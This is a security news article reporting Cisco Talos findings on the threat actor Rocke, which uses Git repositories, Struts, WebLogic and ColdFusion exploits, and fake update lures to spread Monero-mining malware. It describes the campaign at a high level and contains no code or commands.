Chinese-language threat actor Rocke uses Git repositories to distribute Monero-mining malware

• Rocke uses a "varied toolkit" to deploy the Monero-mining malware, researchers said.
• Despite the highly volatile cryptocurrency market, Cisco Talos believes cybercriminals like Rocke will continue to leverage illicit cryptomining campaigns.

Security researchers have uncovered a new Chinese-language threat actor named Rocke that has been leveraging various Git repositories and payloads to distribute and execute a Monero-mining malware. According to Cisco Talos researchers, the threat actor was first spotted in April 2018.

Rocke has been observed using a "varied toolkit" to deploy the malware, including Git repositories, HttpFileServers (HFS), and different payloads including JavaScript backdoors, shell scripts, ELF and PE miners. The threat actor has used both Western and Chinese Git repositories to deliver the malware to honeypot systems vulnerable to an Apache Struts flaw.

"Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named 'c-999.' Subsequently, the Gitee user page transitioned to 'c-888'," researchers noted in a blog post. Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named 'c-18'.

"The repositories on both Gitee and GitLab were identical. All the repositories had a folder called 'ss' that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner."

Once the targeted system is compromised, a cron job is installed to establish persistence on the device. The file itself is a shell script that downloads mining executables form the threat actor's Git repositories that are saved under the filename "java."

Multiple flaws exploited

Researchers noted that Rocke has been exploiting several vulnerabilities to deploy the malware including Apache Struts flaws, an Oracle WebLogic server vulnerability and a critical Java deserialization flaw in Adobe ColdFusion.

In late July, Cisco Talos found the same threat actor engaging in another similar campaign that gave them more insight into the threat actor's methods.

Rocke has been selling a $14 Monero Silent miner as well that has been advertised as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls."

Links to the Iron Cybercrime Groups

Researchers noted that the PE32 Monero miner sample shared similarities with the popular penetration testing software Cobalt Strike that could give the attacker greater control over the infected system.

"The payload appears to be similar to one used by the Iron Cybercrime Group, as reported by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure," the researchers noted. "So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group."

Cisco Talos also believes that Rocke is operating from Jiangxi Province and has been observed trying to access cloud storage series and manuals for programming in Chinese Easy language.

"Based on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines," researchers concluded. "It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates.

"Despite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals."